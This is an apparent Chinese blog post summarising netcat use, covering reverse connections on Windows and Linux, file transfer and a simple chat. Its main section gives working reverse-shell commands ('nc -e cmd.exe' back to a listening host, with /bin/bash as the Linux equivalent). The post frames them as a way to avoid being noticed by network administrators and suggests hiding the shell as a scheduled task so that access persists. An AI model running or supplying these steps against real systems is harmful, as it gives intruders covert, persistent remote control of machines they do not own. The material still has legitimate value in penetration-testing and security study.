Netcat学习总结

版权声明:本文为博主原创文章,转载请注明原创链接! https://blog.csdn.net/qq_39112646/article/details/88768382

一:前言

一般来说,网络管理员对客户端发起的连接服务器请求比较在意,只要是本机开放的1024端口以下都会进行仔细检查。

对服务器发起的请求就没那么在意了,毕竟端口那么多,不可能对每个端口都了解

利用反向连接能减少被网络管理员发现的概率

注:windows版的netcat可以连接Linux版的netcat,Linux版的netcat也可以连接windows版的netcat,两者在参数和程序功能上稍有不同,要注意区分

二:windows下的反向连接

netcat版本带e的才支持反向连接

客户端 win7 10.0.0.5

服务器  win2003 10.0.0.4

1.首先在客户端监听一个小于1024 没有占用的端口

nc -l -v -n -p 22

2.把netcat上传到服务器执行命令

nc -e cmd.exe 10.0.0.5 22 

 

客户端的终端如下

3. 执行命令查看

客户端cmd

服务器的cmd

三:Linux下的反向连接

几乎和windows下的一种,只需将windows下的cmd改为/bin/bash

Linux下有两个netcat,一个是gnu netcat 一个是Netcat 

可以采用Python进行反向连接

四:反向连接技巧

可以将反向连接作为一个定时任务来执行,每天或者每周的某个时候执行,平常在某个角落

五:文件上传

nc -l -p 1433 > virus.exe  
    监听1433端口,等待连接,任何输入的信息都被存储到virus.exe

nc 10.0.0.3 1433 < 1.txt 
    把当前主机上的1.txt 上传到10.0.0.3主机的virus文件

缺点:不会显示是否上传成功,只能断开连接,查看内容

六:聊天

nc -l -p 1433
    监听1433端口,等待连接

nc 10.0.0.3 1433
    把当前主机连接到10.0.0.3计算机上的1433端口

注:在任一终端输入内容后回车,就会在两台电脑的终端上显示出来

猜你喜欢

转载自blog.csdn.net/qq_39112646/article/details/88768382